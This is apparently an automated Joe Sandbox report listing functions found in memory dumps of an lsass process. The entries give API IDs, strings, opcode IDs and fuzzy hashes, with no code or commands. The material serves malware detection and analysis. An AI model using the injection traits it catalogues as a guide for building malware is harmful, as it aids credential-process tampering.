                                                                          • Opcode Fuzzy Hash: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
                                                                          • Instruction Fuzzy Hash: 82114932650B4086E7528B53A84439977A4B79CFF4F644224EF5E87BA5CF38C814C782
                                                                          Function 00000140AE863790 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 44COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000001F.00000002.3611948582.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_31_2_140ae860000_lsass.jbxd
                                                                          Similarity
                                                                          • API ID: CurrentProcessProtectVirtual$HandleModule
                                                                          • String ID: wr
                                                                          • API String ID: 1092925422-2678910430
                                                                          • Opcode ID: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                                                                          • Instruction ID: fd890a10e18ff91e2345af510b04503e6d001258bbebb589a967ba1f92d71b91
                                                                          • Opcode Fuzzy Hash: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                                                                          • Instruction Fuzzy Hash: 81113936B45B8182FF159B23E4082A972A0FB8CBA5F640029DF9D077A4EF3DC905C745
                                                                          Function 00000140AE865B30 Relevance: 9.2, APIs: 6, Instructions: 240threadCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000001F.00000002.3611948582.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_31_2_140ae860000_lsass.jbxd
                                                                          Similarity
                                                                          • API ID: Thread$Current$Context
                                                                          • String ID:
                                                                          • API String ID: 1666949209-0
                                                                          • Opcode ID: 542e600666cb1ac52823d1f72aa5ca11f47e3ee1f4dc73a6c07a176fbafbfe1c
                                                                          • Instruction ID: 4b8643210702c91202cb0783c5a391a2a26d50b369a2e2f855514301358eef3e
                                                                          • Opcode Fuzzy Hash: 542e600666cb1ac52823d1f72aa5ca11f47e3ee1f4dc73a6c07a176fbafbfe1c
                                                                          • Instruction Fuzzy Hash: 98D19736248B8882DA719B0AE49439A77A0F78CB94F600516EF8D47BB5DF3CC941CB81
                                                                          Function 00000140AE862F04 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 93memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000001F.00000002.3611948582.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_31_2_140ae860000_lsass.jbxd
                                                                          Similarity
                                                                          • API ID: Heap$Process$AllocFree
                                                                          • String ID: dialer
                                                                          • API String ID: 756756679-3528709123
                                                                          • Opcode ID: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                                                                          • Instruction ID: a2d052cb6962f498e3cef9ed57c0a8daa6a62b61da821da8834fd8d960af75c0
                                                                          • Opcode Fuzzy Hash: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                                                                          • Instruction Fuzzy Hash: D231B332741B5182EB26DF1BE5447A9A7A0FB4DBA4F2881209F4C47B75EF34C8A5C781
                                                                          Function 00000140AE86CFA0 Relevance: 9.1, APIs: 6, Instructions: 57COMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000001F.00000002.3611948582.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_31_2_140ae860000_lsass.jbxd
                                                                          Similarity
                                                                          • API ID: Value$ErrorLast
                                                                          • String ID:
                                                                          • API String ID: 2506987500-0
                                                                          • Opcode ID: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                                                                          • Instruction ID: b1e378f208745640ce80b78c559ffaa0a20b0e3a8eff5e4311b7b060cf634d78
                                                                          • Opcode Fuzzy Hash: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                                                                          • Instruction Fuzzy Hash: F3112E3028534081FA66AB635A553A962416B9C7F4F344B24EE3E476FADE78DC01D6C3
                                                                          Function 00000140AE86199C Relevance: 9.0, APIs: 6, Instructions: 42stringCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000001F.00000002.3611948582.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_31_2_140ae860000_lsass.jbxd
                                                                          Similarity
                                                                          • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                                          • String ID:
                                                                          • API String ID: 517849248-0
                                                                          • Opcode ID: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                                                                          • Instruction ID: 9022e9ca5b0b5f71c7b82a84b25e46de0569a46428ab685b711a92cff19137a4
                                                                          • Opcode Fuzzy Hash: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                                                                          • Instruction Fuzzy Hash: A5015731740B4082EB51DB53A848799A3A1F78CBD1FA84035DF4D43B65DE38C989C781
                                                                          Function 00000140AE8636C8 Relevance: 9.0, APIs: 6, Instructions: 38threadCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000001F.00000002.3611948582.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_31_2_140ae860000_lsass.jbxd
                                                                          Similarity
                                                                          • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                                                          • String ID:
                                                                          • API String ID: 449555515-0
                                                                          • Opcode ID: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                                                                          • Instruction ID: 301de5e6a3bc59086d6f9150b82df67b6d6c22bbab0207dc7c03168e1951e1a1
                                                                          • Opcode Fuzzy Hash: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                                                                          • Instruction Fuzzy Hash: 01015774651B40C2EB269B23E81879973A0BB9DBA2F240428CF4D07774EF3CC908C782
                                                                          Function 00000140AE868FE8 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 144COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000001F.00000002.3611948582.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_31_2_140ae860000_lsass.jbxd
                                                                          Similarity
                                                                          • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                          • String ID: csm$f
                                                                          • API String ID: 2395640692-629598281
                                                                          • Opcode ID: 255e8a15c903f04b3fededc0bb6945c1536f1eb34c4f108c78a5ad073a1a53ec
                                                                          • Instruction ID: bd338bf40550659d0ab490f789d63c081b601061abea68a920c6aca0165ba548
                                                                          • Opcode Fuzzy Hash: 255e8a15c903f04b3fededc0bb6945c1536f1eb34c4f108c78a5ad073a1a53ec
                                                                          • Instruction Fuzzy Hash: 8351A13265170086EB16CB16E848B9937A6F348BA8F318524DF1A477E8DB3DCC41C782
                                                                          Function 00000140AE863044 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000001F.00000002.3611948582.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_31_2_140ae860000_lsass.jbxd
                                                                          Similarity
                                                                          • API ID: CombinePath
                                                                          • String ID: \\.\pipe\
                                                                          • API String ID: 3422762182-91387939
                                                                          • Opcode ID: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                                                                          • Instruction ID: 0e89825c8f5d70b27a483a01b8d98a85527b4973c2a0efa788cb30948269fb2a
                                                                          • Opcode Fuzzy Hash: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                                                                          • Instruction Fuzzy Hash: A6F05E30644B8082EB058B53B9041996261AB8CFE0F245020EF4E07B78DE38C849C782
                                                                          Function 00000140AE86BC98 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000001F.00000002.3611948582.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_31_2_140ae860000_lsass.jbxd
                                                                          Similarity
                                                                          • API ID: AddressFreeHandleLibraryModuleProc
                                                                          • String ID: CorExitProcess$mscoree.dll
                                                                          • API String ID: 4061214504-1276376045
                                                                          • Opcode ID: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                                                                          • Instruction ID: 0a5f03d881548423950f550b58b8fc74d35f60bbb561fa5f685fc2d061d5bb49
                                                                          • Opcode Fuzzy Hash: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                                                                          • Instruction Fuzzy Hash: 7EF06D71655B0582EB128B26E8443A97320EB8CBB5F740219CF6E472F4CF3DC948D381
                                                                          Function 00000140AE8650D0 Relevance: 7.8, APIs: 5, Instructions: 318threadCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000001F.00000002.3611948582.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_31_2_140ae860000_lsass.jbxd
                                                                          Similarity
                                                                          • API ID: CurrentThread
                                                                          • String ID:
                                                                          • API String ID: 2882836952-0
                                                                          • Opcode ID: e13ad259af2044a9722e5c88be2fea28068701e2040856c8b7ebe2328a6e9181
                                                                          • Instruction ID: 73fda85837acdd30ad006dc6ccb1667200e15de9212539d4e27f8f5c03466d3a
                                                                          • Opcode Fuzzy Hash: e13ad259af2044a9722e5c88be2fea28068701e2040856c8b7ebe2328a6e9181
                                                                          • Instruction Fuzzy Hash: 2702FA32259B8486EB61DB56F49439AB7A1F7C8794F200415EB8E87BB8DF7CC844CB41
                                                                          Function 00000140AE865710 Relevance: 7.6, APIs: 5, Instructions: 124threadCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000001F.00000002.3611948582.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_31_2_140ae860000_lsass.jbxd
                                                                          Similarity
                                                                          • API ID: CurrentThread
                                                                          • String ID:
                                                                          • API String ID: 2882836952-0
                                                                          • Opcode ID: b02f694671304b5a077fe24bce3094f0c3b02718cee177a37b7a7da192a85efa
                                                                          • Instruction ID: 819f4eb226d638b22eb9453569fbd0dff2ed878ae5cb7d9cc285f1354ad887c7
                                                                          • Opcode Fuzzy Hash: b02f694671304b5a077fe24bce3094f0c3b02718cee177a37b7a7da192a85efa
                                                                          • Instruction Fuzzy Hash: 9B61C536559B44C6E7629B16F48439AB7A0F7887A4F600515EF8E47BB8DF7CC840CB82
                                                                          Function 00000140ADFD3504 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000001F.00000002.3602728179.00000140ADFC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140ADFC0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_31_2_140adfc0000_lsass.jbxd
                                                                          Similarity
                                                                          • API ID: _set_statfp
                                                                          • String ID:
                                                                          • API String ID: 1156100317-0
                                                                          • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                          • Instruction ID: 2e1910b8291bafd17102f3214c72d3e729590e13e78c3872cab4fc5f060f1e3e
                                                                          • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                          • Instruction Fuzzy Hash: 22115472614B5353FA56162AE4553EB31C36F5C37CF784628AFE6076F68A34E8436200
                                                                          Function 00000140AE874104 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000001F.00000002.3611948582.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_31_2_140ae860000_lsass.jbxd
                                                                          Similarity
                                                                          • API ID: _set_statfp
                                                                          • String ID:
                                                                          • API String ID: 1156100317-0
                                                                          • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                          • Instruction ID: 28d524a13795f3523b3f1b4b207150eb2f338f5cab7179f9a4c1ef00b7941454
                                                                          • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                          • Instruction Fuzzy Hash: DC119132AD0B5011F667256AD4913E531446B6DBB8F390624AF7E176F68B34CC41C2A2
                                                                          Function 00000140ADFCF040 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 182COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000001F.00000002.3602728179.00000140ADFC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140ADFC0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_31_2_140adfc0000_lsass.jbxd
                                                                          Similarity
                                                                          • API ID: _invalid_parameter_noinfo
                                                                          • String ID: Tuesday$Wednesday$or copy constructor iterator'
                                                                          • API String ID: 3215553584-4202648911
                                                                          • Opcode ID: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
                                                                          • Instruction ID: 48ac8b7a938d00f4a24374fee49c64dd94bfb0dfea2bd827f35d3ab40a9a7452
                                                                          • Opcode Fuzzy Hash: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
                                                                          • Instruction Fuzzy Hash: 3961B43652234853FA6B8B67E5443EBBAA3EF8D748F744415CB46077B4DB34C967A200
                                                                          Function 00000140AE86AA1C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 147COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000001F.00000002.3611948582.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_31_2_140ae860000_lsass.jbxd
                                                                          Similarity
                                                                          • API ID: CallEncodePointerTranslator
                                                                          • String ID: MOC$RCC
                                                                          • API String ID: 3544855599-2084237596
                                                                          • Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                                          • Instruction ID: 1c54ac8669fca167ed3fb4a5461af2b1e7039b1515757cf07daf6e620200d245
                                                                          • Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                                          • Instruction Fuzzy Hash: B6619F33640B848AEB11DF66D4403DD77A0F748BA8F244256EF4E17BA9DB38C995C781
                                                                          Function 00000140ADFCA178 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000001F.00000002.3602728179.00000140ADFC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140ADFC0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_31_2_140adfc0000_lsass.jbxd
                                                                          Similarity
                                                                          • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                          • String ID: csm$csm
                                                                          • API String ID: 3896166516-3733052814
                                                                          • Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                          • Instruction ID: 5e9ed10956360af88f8a3a4b9cf73a15bede84b98f5d365089c0e3503e132e06
                                                                          • Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                          • Instruction Fuzzy Hash: B751E432120388CBEB658B6794443DA37A3FB58B84F244117DB4947BE5CB39E5A2E700
                                                                          Function 00000140AE86AD78 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000001F.00000002.3611948582.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_31_2_140ae860000_lsass.jbxd
                                                                          Similarity
                                                                          • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                          • String ID: csm$csm
                                                                          • API String ID: 3896166516-3733052814
                                                                          • Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                          • Instruction ID: 6cac39d5d8876cbc65fde025732dcd94be71c236f1742025846821184820e854
                                                                          • Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                          • Instruction Fuzzy Hash: D951AF72180780CAEB768F17958439977A0F358BA8F244256DF9D47BE5CB38D890D782
                                                                          Function 00000140ADFC8405 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 135COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000001F.00000002.3602728179.00000140ADFC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140ADFC0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_31_2_140adfc0000_lsass.jbxd
                                                                          Similarity
                                                                          • API ID: CurrentImageNonwritable__except_validate_context_record
                                                                          • String ID: csm$f
                                                                          • API String ID: 3242871069-629598281
                                                                          • Opcode ID: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                                          • Instruction ID: 595c9e32b9df4e514150441d0aa3e925450171a8e5ef433ea7709e32150aded9
                                                                          • Opcode Fuzzy Hash: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                                          • Instruction Fuzzy Hash: E551E43272170487DB96CF16D404BEA3797FB48BA8F318424DB06437A8EBB4C952A704
                                                                          Function 00000140ADFC83E8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 75COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000001F.00000002.3602728179.00000140ADFC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140ADFC0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_31_2_140adfc0000_lsass.jbxd
                                                                          Similarity
                                                                          • API ID: CurrentImageNonwritable__except_validate_context_record
                                                                          • String ID: csm$f
                                                                          • API String ID: 3242871069-629598281
                                                                          • Opcode ID: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                                          • Instruction ID: fdcdef5ba31d8dbb8912a9a905e6b67567b4155f9952f6a6302e3e1a43461dee
                                                                          • Opcode Fuzzy Hash: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                                          • Instruction Fuzzy Hash: 4831CF3122174487E792DF13E844BDA37A7FB48B98F258414EF8A037A8CB38C952D704
                                                                          Function 00000140AE872058 Relevance: 6.3, APIs: 4, Instructions: 299fileCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000001F.00000002.3611948582.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_31_2_140ae860000_lsass.jbxd
                                                                          Similarity
                                                                          • API ID: FileWrite$ConsoleErrorLastOutput
                                                                          • String ID:
                                                                          • API String ID: 2718003287-0
                                                                          • Opcode ID: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
                                                                          • Instruction ID: 4b0a4d86e2932106c0371b6ae4a27eadaf1a36e0bf94906de29ca74a04e3cc8d
                                                                          • Opcode Fuzzy Hash: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
                                                                          • Instruction Fuzzy Hash: 44D1D072B54B8089E712CFAAD5403EC3BB1F3587A8F244216CF5D97BA9DA34C946C381
                                                                          Function 00000140AE8614A4 Relevance: 6.3, APIs: 5, Instructions: 37memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000001F.00000002.3611948582.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_31_2_140ae860000_lsass.jbxd
                                                                          Similarity
                                                                          • API ID: Heap$Process$Free
                                                                          • String ID:
                                                                          • API String ID: 3168794593-0
                                                                          • Opcode ID: 57ec4baa428d3a80e79e8f3b815539f76c7f0782526738c577e62bebd88a5cdf
                                                                          • Instruction ID: e0938be913c4546f92e354b3f490316f5aad01bc8c73eed3b2a93003b4ccae50
                                                                          • Opcode Fuzzy Hash: 57ec4baa428d3a80e79e8f3b815539f76c7f0782526738c577e62bebd88a5cdf
                                                                          • Instruction Fuzzy Hash: 4C015A32A40B90C6E706DF67E94828A77A1F78DFA1F244425EF4E4372ADE38C851C791
                                                                          Function 00000140AE872980 Relevance: 6.2, APIs: 4, Instructions: 218COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000001F.00000002.3611948582.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_31_2_140ae860000_lsass.jbxd
                                                                          Similarity
                                                                          • API ID: ConsoleErrorLastMode
                                                                          • String ID:
                                                                          • API String ID: 953036326-0
                                                                          • Opcode ID: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
                                                                          • Instruction ID: bfe30e0d5e1943aced18828ddcaefd42f41aed77c308e3009ff5d43c7c6b682c
                                                                          • Opcode Fuzzy Hash: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
                                                                          • Instruction Fuzzy Hash: A491AFB264075085F762DF6A94803ED3BA4F758BA8F744109DF4E67AA5DB34CC82C782
                                                                          Function 00000140AE867960 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000001F.00000002.3611948582.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_31_2_140ae860000_lsass.jbxd
                                                                          Similarity
                                                                          • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                          • String ID:
                                                                          • API String ID: 2933794660-0
                                                                          • Opcode ID: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
                                                                          • Instruction ID: a5c049cb69e96cfbb56616fdcd891d3e75a6c1cb872cb67dafead8936c6c1fcc
                                                                          • Opcode Fuzzy Hash: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
                                                                          • Instruction Fuzzy Hash: 28110632B50B018AEB008B61E8542A833A4F719768F540E21DF6D87BA4DF78C598D2C1
                                                                          Function 00000140ADFC9E1C Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 147COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000001F.00000002.3602728179.00000140ADFC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140ADFC0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_31_2_140adfc0000_lsass.jbxd
                                                                          Similarity
                                                                          • API ID: CallTranslator
                                                                          • String ID: MOC$RCC
                                                                          • API String ID: 3163161869-2084237596
                                                                          • Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                                          • Instruction ID: fd2f36d4469ca00d580b9035ee875e4ebab09abcf6c64778c8a765e7c8b01963
                                                                          • Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                                          • Instruction Fuzzy Hash: E9619F33610B888AEB21DF66D0403DE77B2FB48B89F244215EF4917BA8DB38D166D700
                                                                          Function 00000140AE862330 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 141COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000001F.00000002.3611948582.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_31_2_140ae860000_lsass.jbxd
                                                                          Similarity
                                                                          • API ID: FileType
                                                                          • String ID: \\.\pipe\
                                                                          • API String ID: 3081899298-91387939
                                                                          • Opcode ID: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
                                                                          • Instruction ID: c9d078df74486e421dded553d044dc307dfc5948a87b49d5b9b062cc3c97baf6
                                                                          • Opcode Fuzzy Hash: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
                                                                          • Instruction Fuzzy Hash: EE51E03228438181E676DB2FA1583EAA791F3CD7A4F640165DF4D03BAADA39CD44C7C2
                                                                          Function 00000140AE8726F0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000001F.00000002.3611948582.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_31_2_140ae860000_lsass.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorFileLastWrite
                                                                          • String ID: U
                                                                          • API String ID: 442123175-4171548499
                                                                          • Opcode ID: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                                                                          • Instruction ID: 3e73605a521e4cce57338457d13aec77e0fda4a33a28f7c4ac6780cba42ba59d
                                                                          • Opcode Fuzzy Hash: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                                                                          • Instruction Fuzzy Hash: 48417172615B8086DB219F6AE8443E977A1F7987A4F604025EF4D87BA4DB3CC941C781
                                                                          Function 00000140AE8694A0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000001F.00000002.3611948582.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_31_2_140ae860000_lsass.jbxd
                                                                          Similarity
                                                                          • API ID: ExceptionFileHeaderRaise
                                                                          • String ID: csm
                                                                          • API String ID: 2573137834-1018135373
                                                                          • Opcode ID: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                                                                          • Instruction ID: c81f436458b37827e035cf8ccd5af5f126ed8c86e3896386e64a1e0766a3eb38
                                                                          • Opcode Fuzzy Hash: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                                                                          • Instruction Fuzzy Hash: D7112B32614B8082EB628B16E44439977E5F788BA8F684260EF8C077A9DF3CC955CB40
                                                                          Function 00000140ADFC7356 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 18COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000001F.00000002.3602728179.00000140ADFC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140ADFC0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
